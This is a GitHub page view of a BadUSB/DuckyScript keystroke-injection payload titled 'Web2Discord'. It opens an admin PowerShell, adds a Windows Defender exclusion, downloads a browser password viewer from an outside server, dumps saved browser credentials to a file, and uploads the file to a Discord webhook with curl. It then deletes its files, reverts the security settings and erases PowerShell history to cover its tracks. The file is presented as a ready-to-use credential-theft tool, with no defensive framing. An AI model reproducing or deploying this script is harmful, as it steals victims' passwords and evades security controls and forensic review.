-
Notifications
You must be signed in to change notification settings - Fork 21
/
Copy pathWeb2Discord.txt
57 lines (57 loc) · 1.09 KB
/
Web2Discord.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
GUI r
DELAY 1000
STRING powershell -Noprofile "Start-Process powershell -verb runas"
ENTER
DELAY 1500
ALT y
DELAY 1000
STRING $webhook = '%WEBHOOK%'
ENTER
DELAY 500
STRING cd C:\ ; mkdir temp ; cd temp ; Add-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy unrestricted
ENTER
DELAY 500
STRING A
ENTER
STRING clear
ENTER
DELAY 1500
STRING Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip;
ENTER
DELAY 5000
STRING .\WebBrowserPassView.exe
ENTER
DELAY 1500
CTRL A
DELAY 500
CTRL S
DELAY 1500
STRING temp.html
ENTER
DELAY 500
ALT f
DELAY 500
DOWN
DOWN
ENTER
DELAY 3000
ENTER
ENTER
DELAY 1000
STRING curl.exe -F "[email protected]" $webhook
ENTER
DELAY 1000
STRING clear ; cd .. ; rm -r temp/
ENTER
DELAY 1000
STRING Remove-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy restricted
ENTER
DELAY 1500
STRING A
ENTER
DELAY 1000
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
DELAY 500
STRING exit
ENTER